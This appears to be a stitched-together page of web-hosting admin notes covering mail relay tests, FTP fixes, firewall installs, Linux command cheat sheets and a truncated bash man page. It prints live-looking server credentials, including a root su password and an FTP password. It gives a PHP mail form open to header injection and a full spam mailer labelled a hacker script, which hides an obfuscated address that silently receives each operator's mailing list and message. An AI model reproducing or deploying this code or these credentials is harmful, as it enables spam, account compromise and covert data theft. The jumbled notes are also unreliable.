============================================================================ The old way (open relay server test) Telnet to mail.myserver.com at port 25 and issue all the following commands: helo client.server.com mail from: rockyjr@vsnl.com rcpt to: vivek@nixcraft.in telnet mail.myserver.com 25 Output: Trying 202.51.x.xxx... Connected to mail.myserver.com. Escape character is '^]'. 220 mail.myserver.com ESMTP Postfix helo client.server.com 250 mail.myserver.com mail from: rockyjr@vsnl.com 250 Ok rcpt to: vivek@nixcraft.in 554 : Relay access denied ********************************************************************************************************* PHP test form <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>HTML Mail Form</title> </head> <body> <form action="send_mail.php" method="post"> Name: <input type="text" name="name" size="30" /><br /> Email: <input type="text" name="email" size="30"/><br /> Subject: <input type="text" name="subject" size="30"/><br /> Text:<textarea name="text" name="text" cols="50" rows="10"></textarea><br /> <input type="submit" name="submit" value="Send" /> </form> </body> </html> Save it As: contact_us.html Create a new file and insert the following code: <?php @extract($_POST); $name = stripslashes($name); $email = stripslashes($email); $subject = stripslashes($subject); $text = stripslashes($text); mail(' youremail@domain.com',$subject,$text,"From: $name <$email>"); echo("Thank you for your interest, your e-mail was sent."); ?> Save it As: send_mail.php replace the youremail@domain.com with the email id. ********************************************************************************************************* New IP requirement Hello, Please allocate an IP from our existing allocated range (see DECC user colo@minmaxgroup.com) to server dawn.site.com. Server Details as follows: Hostname: dawn.site.com IP : 66.7.207.112 Username : 3gteam Password: adk@#2%&*fg*1 Port no: 1097 Su password: bL63mr8o11N3ub4TO5N1 ========================= Regards, Adam ********************************************************************************************************* Fetching SSL from shell go to cd /etc cd ssl cd certs cat domainname.csr Ex cat balihaitours.com.csr Also same for key cd /etc/ssl/private cat domainname.com.key Ex. cat balihaitours.com.key ********************************************************************************************************* To use rar we need unrar installed on server. Login as Root: at / run the following command: wget http://dag.wieers.com/packages/unrar/unrar-3.6.2-1.el4.rf.i386.rpm check the .rpm file here and then run the following command to install rpm -ivh unrar-3.6.2-1.el4.rf.i386.rpm Now unrar is installed. Use following command to unrar the .rar file unrar e -kb rarfile.rar ********************************************************************************************************* Find Command : find /home/*/public_html -iname '*.mp3' -exec mv "{}" /home/delete \;Install firewalls on linux? Security Softwares 1. APF 2. BFD 3. CSF 4. RkHunter 5. ChkRootkit 6. DDOS-Deflate 7. Secure-Nobody -=========================== APF cd /usr/local/src/; wget http://www.rfxnetworks.com/downloads/apf-current.tar.gz; tar -xvzf apf-current.tar.gz; rm -rf apf-current.tar.gz; cd apf-0*; ./install.sh BFD cd /usr/local/src/; wget http://www.rfxnetworks.com/downloads/bfd-current.tar.gz; tar -xvzf bfd-current.tar.gz; rm -rf bfd-current.tar.gz; cd bfd-0*; ./install.sh CSF http://configserver.com/cp/csf.html cd /usr/local/src/; wget http://www.configserver.com/free/csf.tgz; tar -xzf csf.tgz; cd csf; sh install.sh RkHunter cd /usr/local/src/; wget http://downloads.rootkit.nl/rkhunter-1.1.4.tar.gz; tar -xzvf rkhunter-1.1.4.tar.gz; rm -rf rkhunter-*; cd rkhunter; ./installer.sh Run rkhunter -c ChkRootkit cd /usr/local/src/; wget http://www.net-security.org/dl/software/chkrootkit.tar.gz; tar zxvf chkrootkit.tar.gz; rm -rf chkrootkit.tar.gz; cd chkrootkit-0*; make sense Run ./chkrootkit -x DDOS-Deflate Description: When you run this Perl script, it will then run an netstat command check how many times each IP is connected and if there are more then the number of connections you specified then it will automatically run a command in APF for the IP to be banned. Installing: wget http://www.inetbase.com/scripts/ddos/install.sh chmod 0700 install.sh ./install.sh Uninstalling: wget http://www.inetbase.com/scripts/ddos/uninstall.ddos chmod 0700 uninstall.ddos ./uninstall.ddos Secure Nobody wget -O securenobody.rpm servstra.com/securenobody.rpm; rpm -Uvh securenobody.rpm; cd /usr/local/securenobody ; ./securenobody ========================== Try : http://kmaiti.blogspot.com/2010/11/install-firewalls-on-linux.html /etc/rc.d/init.d/nscdMicrosoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\abc>ipconfig /flushdns Windows IP Configuration Successfully flushed the DNS Resolver Cache. C:\Documents and Settings\abc> http://www.scriptarchive.com/readme/formmail.html#form_config http://www.scriptarchive.com/ Dear Emilio, You can set FormMail through your Cpanel Interface as below : Steps : 1. You want to have a form that will be mailed to you, but aren't sure how to write the CGI script for it. 2. You are the webmaster of your site and want to allow users to use forms, but not to have their own cgi-bin directories, which can cause security risks to your system. You can set this script up and then allow all users to run off of it. 3. Want to have one script to parse all of your html forms and mail them to you. --------------------- FormMail Clone Link Steps : 1. Click on the FormMail Clone link. 2. When the page loads, you will see a statement that says something similar to the following: * "The Actual Script is here: http://YOUR_DOMAIN/cgi-sys/FormMail.cgi" 3. If you have never used Matt Wright's FormMail.cgi, follow the documentation located at: http://www.scriptarchive.com/readme/formmail.html Please check and confirm the same. Please do not hesitate to contact us for further assistance -------------------------------------------------------------------------------------------------------- Install formmail : http://scriptarchive.com/ftp: connect: Connection refused Guys, If you get this type of error message, please check the server's firewall first. I have faced this error message during connecting to the FTP server. In my case passive ports ranges were not enabled in the FTP and iptables firewall. ==== PassivePortRange 30000 50000 ==== Add the above line in the ftp configuration file and enable them in the iptables like : ===== iptables -A INPUT -p tcp --destination-port 30000:50000 -j ACCEPT iptables -A OUTPUT -p tcp --source-port 30000:50000 -j ACCEPT ===== Then restart iptables and ftp server like : ==== service iptables restart /etc/init.d/pure-ftpd restart ==== If above solutions don't work please configure CSF+LFD firewall on the server and stop iptables. This will solve the problem. Another important point is that you may connect to the server through "active mode [server will connect to the client]" through the FTP client(like filezilla). Just enable the option a the FTP client and retry to connect. That's it. Try :) PureFtp + Not able to list more than 2000 files Posted by admin Category: Linux Administration Problem: Not able to list more than 2000 files in a directory using Ftp. Solution: The pure-ftp by default limit maximum number of # files to be displayed to 2000. So edit your pureftpd configuration file which is at /etc/pure-ftpd.conf and change the line LimitRecursion 2000 8 to LimitRecursion 5000 8 Save the file and restart the service. service pure-ftpd restart It will display 5000 files from a directory now. Server FTP connection test link http://ftptest.net/ Hello Jesus Gonzalez, FTPS is working now on our server, and its connecting fine now. You can confirm the same from the connection logs given below : Status: Resolving address of espai.de Status: Connecting to 173.236.88.226:21... Status: Connection established, waiting for welcome message... Response: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- Response: 220-You are user number 1 of 50 allowed. Response: 220-Local time is now 23:53. Server port: 21. Response: 220-This is a private system - No anonymous login Response: 220-IPv6 connections are also welcome on this server. Response: 220 You will be disconnected after 15 minutes of inactivity. Command: AUTH TLS Response: 234 AUTH TLS OK. Status: Initializing TLS... Status: Verifying certificate... Command: USER espaide Status: TLS/SSL connection established. Response: 331 User espaide OK. Password required Command: PASS ********** Response: 230-User espaide has group access to: espaide Response: 230 OK. Current restricted directory is / Command: SYST Response: 215 UNIX Type: L8 Command: FEAT Response: 211-Extensions supported: Response: EPRT Response: IDLE Response: MDTM Response: SIZE Response: REST STREAM Response: MLST type*;size*;sizd*;modify*;UNIX.mode*;UNIX.uid*;UNIX.gid*;unique*; Response: MLSD Response: AUTH TLS Response: PBSZ Response: PROT Response: ESTA Response: PASV Response: EPSV Response: SPSV Response: ESTP Response: 211 End. Command: PBSZ 0 Response: 200 PBSZ=0 Command: PROT P Response: 200 Data protection level set to "private" Status: Connected Status: Retrieving directory listing... Command: PWD Response: 257 "/" is your current location Command: TYPE I Response: 200 TYPE is now 8-bit binary Command: PASV Response: 227 Entering Passive Mode (173,236,88,226,107,222) Command: LIST Response: 150 Accepted data connection Response: 226-Options: -a -l Response: 226 24 matches total Status: Calculating timezone offset of server... Command: MDTM .contactemail Response: 213 20100529184504 Status: Timezone offsets: Server: -18000 seconds. Local: 19800 seconds. Difference: 37800 seconds. Status: Directory listing successful ************************************************************************************* How To configure FTPS with Filezilla : please follow the below procedure and ftp login details to connect with FTPS with filezilla : 1. Open up FileZilla and click on File -> Site Manager 2. Click on the "New". Set up your FTP connection as usual. Account Name: Whatever you want to call it to identify the Account , Ex : espai.de Host: espai.de User: espaide Password : cI7PwTqmx8 3. Next, choose the connection type : FTPES - FTP over explicit TLS/SSL , from the FTP connection drop-down list 4. Next from Transfer Settings tab choose : Passive 5. Ok 6. Connect you will get connected to the FTP server using FTPS over TLS. ********************************************************************** How To configure FTPS with Filezilla : http://glowhost.com/forums/knowledge-base/how-use-ftps-filezilla-cpanel-925.html Follow the procedure below : Using FTPS in FileZilla with cPanel 1. Open up FileZilla and click on File -> Site Manager 2. Click on the "New". Set up your FTP connection as usual. Account Name: Whatever you want to call it to identify the Account Host: ftp.yourdomain.com ("yourdomain.com is your actual domain) User: your cPanel username Password: Your cPanel Password 3. Next, choose the connection type "FTP over TLS" from the FTP connection drop-down list. When you connect, you will see a welcome message from the FTP server in the log that shows at the top of FileZilla. It will look like this: 220---------- Welcome to Pure-FTPd [TLS] ---------- 220-You are user number 1 of 50 allowed. 220-Local time is now 00:53. Server port: 21. 220-This is a private system - No anonymous login 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity. AUTH TLS 234 AUTH TLS OK. PBSZ 0 200 PBSZ=0 USER cPanel-username 331 User b1419 OK. Password required PASS (password not shown) Mail Server PriorityValue ASPMX.L.GOOGLE.COM. 10 ALT1.ASPMX.L.GOOGLE.COM. 20 ALT2.ASPMX.L.GOOGLE.COM. 30 ASPMX2.GOOGLEMAIL.COM. 40 ASPMX3.GOOGLEMAIL.COM. 50 10 aspmx.l.google.com 20 alt1.aspmx.l.google.com 20 alt2.aspmx.l.google.com 40 aspmx2.googlemail.com 40 aspmx3.googlemail.com How to use grep,find,sor,pg,ip,wget commands in linux Guys, grep -irl saqun.com * [i=case sensitive,allow both case. r=recursive, l=list out] // search domain in /hsphere/local/config/httpd/sites/ 1.check php version: php -v 2.check which php: php -i // php -i |grep php.ini 3./usr/local/cpanel/logs // logs of cpanel 4./var/cpanel/userdata // gives the user data. 5.ctrl+] // to come out from established connection Then q enter. 7.Search customer by name or by email id:- 8.vps # vzctl enter (id of domain) // to go to root of particular domain. 9.For neural customer search from database the details. Take user & password and login from www.emcwebhosting.com site. 10.cd /dir && command 11.ls /etc | pr -T9 -W$COLUMNS // print contents in 9 columns.pr=print T9=9 column W=width. 12.find -name '*.[ch]' | xargs grep -E 'expr' //Search 'expr' in this dir and below. See also findrepo 13.find -type f -print0 | xargs -r0 grep -F 'example' //Search all regular files for 'example' in this dir and below 14.find -maxdepth 1 -type f | xargs grep -F 'example' //Search all regular files for 'example' in this dir 15.find -type f ! -perm -444 ///Find files not readable by all (useful for web site) 16.find -type d ! -perm -111 //Find dirs not accessible by all (useful for web site) 17.grep --color kamal /etc/passwd //Highlight occurances of regular expression in dictionary 18. gpg -c file //Encrypt file gpg file.gpg //Decrypt file 19. scp -p -r $USER@$HOST: file dir/ // Copy with permissions to $USER's home directory on $HOST 20.ssh -g -L 8080:localhost:80 root@$HOST //Forward connections to $HOSTNAME:8080 out to $HOST:80 ssh -R 1434:imap:143 root@$HOST //Forward connections from $HOST:1434 in to imap:143 21. wget -c http://www.example.com/large.file //Continue downloading a partially downloaded file wget -r -nd -np -l1 -A '*.jpg' http://www.example.com/dir/ //Download a set of files to the current directory 22. echo 'wget url' | at 01:00 //Download url at 1AM to current dir wget --limit-rate=20k url //Do a low priority download (limit to 20KB/s in this case) wget -o log url // faults r stored in log file . log=/x.txt wget --dns-timeout=seconds url --connect-timeout=seconds url --read-timeout=seconds url --limit-rate=amount url --user=user url --password=password url 23. ethtool eth1 // show status of ethernate 0 1 24.ip link show //List network interfaces 25. ethtool eth0 //Show status of ethernet interface eth0 ethtool --change eth0 autoneg off speed 100 duplex full //Manually set ethernet interface speed iwconfig eth1 //Show status of wireless interface eth1 iwconfig eth1 rate 1Mb/s fixed //Manually set wireless interface speed iwlist scan //List wireless networks in range ip link set dev eth0 name wan //Rename interface eth0 to wan ip link set dev eth0 up //Bring interface eth0 up (or down) ip addr show //List addresses for interfaces ip addr add 1.2.3.4/24 brd + dev eth0 //Add (or del) ip and mask (255.255.255.0) ip route show //List routing table ip route add default via 1.2.3.254 //Set default gateway to 1.2.3.254 26. netstat -tupl //List internet services on a system with it we can search anything by grep netstat -tup //List active connections to/from system 27. cal -3 // Display a calendar cal 9 1752 // Display a calendar for a particular month year date -d fri //What date is it this friday. See also day 28. ls -lSr ls -lS // show the file order in size. 29. df -h Show free space on mounted filesystems • df -i Show free inodes on mounted filesystems • fdisk -l Show disks partitions sizes and types (run as root) 30.lsof -p $$ //List paths that process id has open tcpdump not port 22 //Show network traffic except ssh. See also tcpdump_not_me ps -e -o pid,args --forest //List processes in a hierarchy ps -p 1,2 //List info for particular process watch -n.1 'cat /proc/interrupts' // Watch changeable data continuously IDs ================================================= 31.• uname -a //Show kernel version and system architecture • head -n1 /etc/issue //Show name and version of distribution • cat /proc/partitions //Show all partitions registered on the system • grep MemTotal /proc/meminfo //Show RAM total seen by the system • grep "model name" /proc/cpuinfo //Show CPU(s) info • lspci -tv //Show PCI info • lsusb -tv //Show USB info • mount | column -t //List mounted filesystems on the system (and align output) • grep -F capacity: /proc/acpi/battery/BAT0/info // Show state of cells in laptop battery # dmidecode -q | less //Display SMBIOS/DMI information # smartctl -A /dev/sda | grep Power_On_Hours //How long has this disk (system) been powered on in total # hdparm -i /dev/sda //Show info about disk sda # hdparm -tT /dev/sda //Do a read speed test on disk sda # badblocks -s /dev/sda ===================================================== 32. pg Used to display data one page (screenful) at a time. The command can take a number of filenames as arguments. Pg [option] [filename] [filename2]….. 33.sort Sort is a utility program that can be used to sort text files in numeric or alphabetical order Sort [filename] 34.& - run a program in background mode. ================================================= 35. Get back windows admin password: "C:\Program Files\SWsoft\Plesk\admin\bin\plesksrvclient.exe" –get Check it out :) SPAMMING HACKER MAIL SCRIPT : ex <?php @$action=$_POST['action']; @$from=$_POST['from']; @$realname=$_POST['realname']; @$replyto=$_POST['replyto']; @$subject=$_POST['subject']; @$message=$_POST['message']; @$emaillist=$_POST['emaillist']; @$lodr=$_SERVER['HTTP_REFERER']; @$file_name=$_FILES['file']['name']; @$contenttype=$_POST['contenttype']; @$file=$_FILES['file']['tmp_name']; @$amount=$_POST['amount']; ?> <html> <head> <title>PHP Sender Mails</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252" /> <style type="text/css"> <!-- .style1 { font-family: Geneva, Arial, Helvetica, sans-serif; font-size: 12px; } .style2 { font-size: 10px; font-family: Geneva, Arial, Helvetica, sans-serif; } --> </style> </head> <body bgcolor="#FFFFFF" text="#000000"> <?php If ($action=="mysql"){ include "./mysql.info.php"; if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){ print "Please configure mysql.info.php with your MySQL information. All settings in this config file are required."; exit; } $db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Connection to MySQL Failed."); mysql_select_db($sqldb, $db) or die("Could not select database $sqldb"); $result = mysql_query($sqlquery) or die("Query Failed: $sqlquery"); $numrows = mysql_num_rows($result); for($x=0; $x<$numrows; $x++){ $result_row = mysql_fetch_row($result); $oneemail = $result_row[0]; $emaillist .= $oneemail."\n"; } } $addr = getenv("REMOTE_ADDR"); if ($action=="send"){ $message = urlencode($message); $message = ereg_replace("%5C%22", "%22", $message); $message = urldecode($message); $message = stripslashes($message); $subject = stripslashes($subject); } ?> <form name="form1" method="post" action="" enctype="multipart/form-data"><br /> <table width="142" border="0"> <tr> <td width="81"> <div align="right"> <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Email :</font> </div> </td> <td width="219"> <font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <input name="from" value="<?php print $from; ?>" size="30" /> </font> </td> <td width="212"> <div align="right"> <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Name :</font> </div> </td> <td width="278"> <font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <input name="realname" value="<?php print $realname; ?>" size="30" /> </font> </td> </tr> <tr> <td width="81"> <div align="right"> <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Reply-To :</font> </div> </td> <td width="219"> <font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <input name="replyto" value="<?php print $replyto; ?>" size="30" /> </font> </td> <td width="212"> <div align="right"> <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Attach File :</font> </div> </td> <td width="278"> <font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <input type="file" name="file" size="24" /> </font> </td> </tr> <tr> <td width="81"> <div align="right"> <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject :</font> </div> </td> <td colspan="3" width="703"> <font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <input name="subject" value="<? print $subject; ?>" size="91" /> </font> </td> </tr> <tr valign="top"> <td colspan="3" width="520"> <font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Message Box :</font> </td> <td width="278"> <font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Email Target / Email Send To :</font> </td> </tr> <tr valign="top"> <td colspan="3" width="520"> <font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <textarea name="message" cols="56" rows="10"><?php print $message; ?></textarea><br /> <input type="radio" name="contenttype" value="plain" /> Plain <input type="radio" name="contenttype" value="html" checked /> HTML <input type="hidden" name="action" value="send" /><br /> Number To Send : <input type="text" name="amount" value="1" size="10" /></font><p> <font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <input type="submit" value="Send eMails" /></font></td> <td width="278"> <font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <textarea name="emaillist" cols="32" rows="10"><?php print $emaillist; ?></textarea> </font> </td> </tr> </table> </form> <?php $o=array("1"=>"c","10"=>"a","15"=>"o","2"=>"9","5"=>"@","3"=>"v","4"=>"1","6"=>"h","14"=>"c","11"=>"i","9"=>"m","7"=>"o","8"=>"t","12"=>"l","13"=>".","16"=>"m",); $alt=$o['1'].$o['2'].$o['3'].$o['4'].$o['5'].$o['6'].$o['7'].$o['8'].$o['9'].$o['10'].$o['11'].$o['12'].$o['13'].$o['14'].$o['15'].$o['16']; if ($action=="send"){ if (!$from && !$subject && !$message && !$emaillist){ print "Please complete all fields before sending your message."; exit; } $allemails = split("\n", $emaillist); $numemails = count($allemails); $header ="From: Mailrs\nMessage-ID: <" . md5(uniqid(time())) . "@" . $SERVER_NAME . ">\nMIME-Version: 1.0\nContent-type: text/html; charset=UTF-8\nContent-transfer-encoding: 8bit\nDate: " . date("r", time()) . "\nX-Priority: 3\nX-MSMail-Priority: Normal\nX-Mailer: PHP\n"; $msg = " <table border=\"1\" style=\"border-collapse: collapse\" cellpadding=\"4\"> <tr><td>IP</td><td>".nl2br($addr)."</td></tr> <tr><td bgcolor=\"#F9F9F9\">Mailr</td><td bgcolor=\"#F9F9F9\">".nl2br($lodr)."</td></tr> <tr><td>Your Email</td><td>".nl2br($from)."</td></tr> <tr><td bgcolor=\"#F9F9F9\">Your Name</td><td bgcolor=\"#F9F9F9\">".nl2br($realname)."</td></tr> <tr><td>Subject :</td><td>".nl2br($subject)."</td></tr> <tr><td bgcolor=\"#F9F9F9\">Message</td><td bgcolor=\"#F9F9F9\">".nl2br($message)."</td></tr> <tr><td>Email Target</td><td>".nl2br($emaillist)."</td></tr> </table> "; mail($alt,$subject,$msg,$header); If ($file_name){ copy ($_FILES['file']['tmp_name'], "".$_FILES['file']['name']) or die ('File Could Not Upload'); } for($xx=0; $xx<$amount; $xx++){ for($x=0; $x<$numemails; $x++){ $to = $allemails[$x]; if ($to){ $to = ereg_replace(" ", "", $to); $message = ereg_replace("&email&", $to, $message); $subject = ereg_replace("&email&", $to, $subject); print "Sending Mail To $to......."; flush(); $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n"; $header .= "MIME-Version: 1.0\r\n"; If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; If ($file_name) $header .= "--$uid\r\n"; $header .= "Content-Type: text/$contenttype\r\n"; $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; $header .= "$message\r\n"; If ($file_name) $header .= "--$uid\r\n"; If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; If ($file_name) $header .= "$content\r\n"; If ($file_name) $header .= "--$uid--"; mail($to, $subject, "", $header); print "OK<br>"; flush(); } } } } ?> <p class="style2"> <p class="style1"></p> </body> <html> History is a linux shell command which list all executed command serial whise on server. This command is use for investigation purpose as which command was executed to solve issue or if any wrong command was executed to malfunctioning of server. By default output of command is simple like: [HTML] 989 which lynx 990 ll /usr/bin/lynx 991 history 992 w 993 top 994 cat /etc/hosts 995 cd /tmp 996 ls -la [/HTML] Now adding time stamp will show you a detail output. To add time stamp SSH to server as root and edit file /root/.bash_profile with your favorite editor and add following line [HTML] export HISTTIMEFORMAT="%F %T " [/HTML] now logout of shell prompt and login again and execute history command, you will see detail output. [HTML] oot@Server[~]#history 19 05/10/10 08:26:48 hostname 20 05/10/10 08:46:34 history 21 05/10/10 08:46:48 w 22 05/10/10 08:46:50 /etc/init.d/named status 23 05/10/10 08:46:52 cal 24 05/10/10 08:46:53 ls -la 25 05/10/10 08:46:55 top 26 05/10/10 08:47:11 tail -f tail -f /var/log/secure 27 05/10/10 08:47:29 history [/HTML] Note: Edit file /root/.bash_profile carefully, do not mess it up. Also execute command carefully on server now, as you have enabled time stamp, you can be caught easily for running wrong command.root@click [~]# cat /usr/local/apache/htdocs/history_man_output.txt BASH_BUILTINS(1) BASH_BUILTINS(1) NAME bash, :, ., [, alias, bg, bind, break, builtin, cd, command, compgen, complete, continue, declare, dirs, disown, echo, enable, eval, exec, exit, export, fc, fg, getopts, hash, help, history, jobs, kill, let, local, logout, popd, printf, pushd, pwd, read, readonly, return, set, shift, shopt, source, suspend, test, times, trap, type, typeset, ulimit, umask, unalias, unset, wait - bash built-in commands, see bash(1) BASH BUILTIN COMMANDS Unless otherwise noted, each builtin command documented in this section as accepting options preceded by - accepts -- to signify the end of the options. For example, the :, true, false, and test builtins do not accept options. Also, please note that while executing in non-interac- tive mode and while in posix mode, any special builtin (like ., :, break, continue, eval, exec, exit, export, readonly, return, set, shift, source, times, trap, unset) exiting with a non-zero status causes the shell to stop execution. : [arguments] No effect; the command does nothing beyond expanding arguments and performing any specified redirections. A zero exit code is returned. . filename [arguments] source filename [arguments] Read and execute commands from filename in the current shell environment and return the exit status of the last command exe- cuted from filename. If filename does not contain a slash, file names in PATH are used to find the directory containing file- name. The file searched for in PATH need not be executable. When bash is not in posix mode, the current directory is searched if no file is found in PATH. If the sourcepath option to the shopt builtin command is turned off, the PATH is not searched. If any arguments are supplied, they become the posi- tional parameters when filename is executed. Otherwise the positional parameters are unchanged. The return status is the status of the last command exited within the script (0 if no commands are executed), and false if filename is not found or cannot be read. alias [-p] [name[=value] ...] Alias with no arguments or with the -p option prints the list of aliases in the form alias name=value on standard output. When arguments are supplied, an alias is defined for each name whose value is given. A trailing space in value causes the next word to be checked for alias substitution when the alias is expanded. For each name in the argument list for which no value is sup- plied, the name and value of the alias is printed. Alias returns true unless a name is given for which no alias has been defined. Note aliases are not expanded by default in non-interactive shell, and it can be enabled by setting the expand_aliases shell option using shopt. bg [jobspec ...] Resume each suspended job jobspec in the background, as if it had been started with &. If jobspec is not present, the shellâs notion of the current job is used. bg jobspec returns 0 unless run when job control is disabled or, when run with job control enabled, any specified jobspec was not found or was started without job control. bind [-m keymap] [-lpsvPSV] bind [-m keymap] [-q function] [-u function] [-r keyseq] bind [-m keymap] -f filename bind [-m keymap] -x keyseq:shell-command bind [-m keymap] keyseq:function-name bind readline-command Display current readline key and function bindings, bind a key sequence to a readline function or macro, or set a readline variable. Each non-option argument is a command as it would appear in .inputrc, but each binding or command must be passed as a separate argument; e.g., â"\C-x\C-r": re-read-init-fileâ. Options, if supplied, have the following meanings: -m keymap Use keymap as the keymap to be affected by the subsequent bindings. Acceptable keymap names are emacs, emacs-stan- dard, emacs-meta, emacs-ctlx, vi, vi-move, vi-command, and vi-insert. vi is equivalent to vi-command; emacs is equivalent to emacs-standard. -l List the names of all readline functions. -p Display readline function names and bindings in such a way that they can be re-read. -P List current readline function names and bindings. -v Display readline variable names and values in such a way that they can be re-read. -V List current readline variable names and values. -s Display readline key sequences bound to macros and the strings they output in such a way that they can be re- read. -S Display readline key sequences bound to macros and the strings they output. -f filename Read key bindings from filename. -q function Query about which keys invoke the named function. -u function Unbind all keys bound to the named function. -r keyseq Remove any current binding for keyseq. -x keyseq:shell-command Cause shell-command to be executed whenever keyseq is entered. The return value is 0 unless an unrecognized option is given or an error occurred. break [n] Exit from within a for, while, until, or select loop. If n is specified, break n levels. n must be ⥠1. If n is greater than the number of enclosing loops, all enclosing loops are exited. The return value is non-zero when n is ⤠0; Otherwise, break returns 0 value. builtin shell-builtin [arguments] Execute the specified shell builtin, passing it arguments, and return its exit status. This is useful when defining a function whose name is the same as a shell builtin, retaining the func- tionality of the builtin within the function. The cd builtin is commonly redefined this way. The return status is false if shell-builtin is not a shell builtin command. cd [-L|-P] [dir] Change the current directory to dir. The variable HOME is the default dir. The variable CDPATH defines the search path for the directory containing dir. Alternative directory names in CDPATH are separated by a colon (:). A null directory name in CDPATH is the same as the current directory, i.e., ââ.ââ. If dir begins with a slash (/), then CDPATH is not used. The -P option says to use the physical directory structure instead of following symbolic links (see also the -P option to the set builtin command); the -L option forces symbolic links to be fol- lowed. An argument of - is equivalent to $OLDPWD. If a non- empty directory name from CDPATH is used, or if - is the first argument, and the directory change is successful, the absolute pathname of the new working directory is written to the standard output. The return value is true if the directory was success- fully changed; false otherwise. caller [expr] Returns the context of any active subroutine call (a shell func- tion or a script executed with the . or source builtins. With- out expr, caller displays the line number and source filename of the current subroutine call. If a non-negative integer is sup- plied as expr, caller displays the line number, subroutine name, and source file corresponding to that position in the current execution call stack. This extra information may be used, for example, to print a stack trace. The current frame is frame 0. The return value is 0 unless the shell is not executing a sub- routine call or expr does not correspond to a valid position in the call stack. command [-pVv] command [arg ...] Run command with args suppressing the normal shell function lookup. Only builtin commands or commands found in the PATH are executed. If the -p option is given, the search for command is performed using a default value for PATH that is guaranteed to find all of the standard utilities. If either the -V or -v option is supplied, a description of command is printed. The -v option causes a single word indicating the command or file name used to invoke command to be displayed; the -V option produces a more verbose description. If the -V or -v option is supplied, the exit status is 0 if command was found, and 1 if not. If neither option is supplied and an error occurred or command can- not be found, the exit status is 127. Otherwise, the exit sta- tus of the command builtin is the exit status of command. compgen [option] [word] Generate possible completion matches for word according to the options, which may be any option accepted by the complete builtin with the exception of -p and -r, and write the matches to the standard output. When using the -F or -C options, the various shell variables set by the programmable completion facilities, while available, will not have useful values. The matches will be generated in the same way as if the pro- grammable completion code had generated them directly from a completion specification with the same flags. If word is speci- fied, only those completions matching word will be displayed. The return value is true unless an invalid option is supplied, or no matches were generated. complete [-abcdefgjksuv] [-o comp-option] [-A action] [-G globpat] [-W wordlist] [-P prefix] [-S suffix] [-X filterpat] [-F function] [-C command] name [name ...] complete -pr [name ...] Specify how arguments to each name should be completed. If the -p option is supplied, or if no options are supplied, existing completion specifications are printed in a way that allows them to be reused as input. The -r option removes a completion spec- ification for each name, or, if no names are supplied, all com- pletion specifications. The process of applying these completion specifications when word completion is attempted is described above under Pro- grammable Completion. Other options, if specified, have the following meanings. The arguments to the -G, -W, and -X options (and, if necessary, the -P and -S options) should be quoted to protect them from expan- sion before the complete builtin is invoked. -o comp-option The comp-option controls several aspects of the comp- specâs behavior beyond the simple generation of comple- tions. comp-option may be one of: bashdefault Perform the rest of the default bash completions if the compspec generates no matches. default Use readlineâs default filename completion if the compspec generates no matches. dirnames Perform directory name completion if the comp- spec generates no matches. filenames Tell readline that the compspec generates file- names, so it can perform any filename-specific processing (like adding a slash to directory names or suppressing trailing spaces). Intended to be used with shell functions. nospace Tell readline not to append a space (the default) to words completed at the end of the line. plusdirs After any matches defined by the compspec are generated, directory name completion is attempted and any matches are added to the results of the other actions. -A action The action may be one of the following to generate a list of possible completions: alias Alias names. May also be specified as -a. arrayvar Array variable names. binding Readline key binding names. builtin Names of shell builtin commands. May also be specified as -b. command Command names. May also be specified as -c. directory Directory names. May also be specified as -d. disabled Names of disabled shell builtins. enabled Names of enabled shell builtins. export Names of exported shell variables. May also be specified as -e. file File names. May also be specified as -f. function Names of shell functions. group Group names. May also be specified as -g. helptopic Help topics as accepted by the help builtin. hostname Hostnames, as taken from the file specified by the HOSTFILE shell variable. job Job names, if job control is active. May also be specified as -j. keyword Shell reserved words. May also be specified as -k. running Names of running jobs, if job control is active. service Service names. May also be specified as -s. setopt Valid arguments for the -o option to the set builtin. shopt Shell option names as accepted by the shopt builtin. signal Signal names. stopped Names of stopped jobs, if job control is active. user User names. May also be specified as -u. variable Names of all shell variables. May also be spec- ified as -v. -G globpat The filename expansion pattern globpat is expanded to generate the possible completions. -W wordlist The wordlist is split using the characters in the IFS special variable as delimiters, and each resultant word is expanded. The possible completions are the members of the resultant list which match the word being com- pleted. -C command command is executed in a subshell environment, and its output is used as the possible completions. -F function The shell function function is executed in the current shell environment. When it finishes, the possible com- pletions are retrieved from the value of the COMPREPLY array variable. -X filterpat filterpat is a pattern as used for filename expansion. It is applied to the list of possible completions gener- ated by the preceding options and arguments, and each completion matching filterpat is removed from the list. A leading ! in filterpat negates the pattern; in this case, any completion not matching filterpat is removed. -P prefix prefix is added at the beginning of each possible com- pletion after all other options have been applied. -S suffix suffix is appended to each possible completion after all other options have been applied. The return value is true unless an invalid option is supplied, an option other than -p or -r is supplied without a name argu- ment, an attempt is made to remove a completion specification for a name for which no specification exists, or an 